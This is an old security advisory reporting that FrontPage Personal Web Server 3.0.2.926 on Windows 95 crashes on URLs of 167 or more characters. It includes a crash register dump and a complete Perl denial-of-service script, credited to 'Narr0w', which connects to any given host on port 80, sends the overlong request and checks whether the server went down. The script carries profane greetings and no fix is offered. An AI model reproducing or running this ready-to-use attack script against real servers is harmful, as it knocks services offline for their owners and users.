COMMAND
FrontPage
SYSTEMS AFFECTED
Win systems with FP
PROBLEM
Narr0w found following. FrontPage PWD32/3.0.2.926 for Win'XX
crashes when the url is 167+ long. Narr0w tested it only on:
Windows'95 FrontPage Server Extensions Version: 3.0.2.926
Version: FrontPage-PWS32/3.0.2.926. Here is the error message:
VHTTPD32 caused an invalid page fault in
module VHTTPD32.EXE at 0137:0040aaed.
Registers:
EAX=010d7740 CS=0137 EIP=0040aaed EFLGS=00010202
EBX=00000000 SS=013f ESP=010d53d0 EBP=010d0074
ECX=010d7740 DS=013f ESI=010d7740 FS=13c7
EDX=000000a8 ES=013f EDI=bff92ac1 GS=0000
Bytes at CS:EIP:
ff 75 10 56 68 94 01 00 00 eb 1c 68 00 24 40 00
Stack dump:
00000010 010d7740 00000000 00000000 00000000
00000000 00000000 00000000 00000000 00000000
00000000 00000000 00000000 00000000 00000000
00000000
Attached is an perl script that connects to the host & sends 167
long url.
#!/usr/bin/perl
#########################################################
# #
# FrontPage-PWS32/3.0.2.926 DoS By Narr0w. #
# #
# #
# #
# Greetz to: STAR-W0RMS & Legion2000 Group #
# #
# Big FUCK to the channel #hacking @EFNET......... #
#########################################################
use IO::Socket;
if(@ARGV < 1) { die "\nUsage: $0 <host>\n\n"; }
$len=length($ARGV[0]);
if($len >= 64) { die "\nError: Host Length Too Long ($len)...\n"; }
$host = @ARGV[0];
print "Connecting to $host...\t";
$socket = IO::Socket::INET->new(PeerAddr => $host,PeerPort => 80,Proto => "TCP") || die "[FAILED]\n";
print "[ OK ]\n";
print "Sending x's...\t\t";
print $socket "GET /" . "x"x167 . " HTTP/1.0\n\n";
print "\t[ OK ]\n";
print "Checking...\t\t\t";
sleep(5);
while(<$socket>) {
chop;
if(/404 Not Found/) {
print "[FAILED]\n";
print "\nThis DoS does not work on this server ($host) ...\n";
close $socket;
exit(0);
}
else
{
print "[ OK ]\n";
close $socket;
}
}
exit;
SOLUTION
Nothing yet.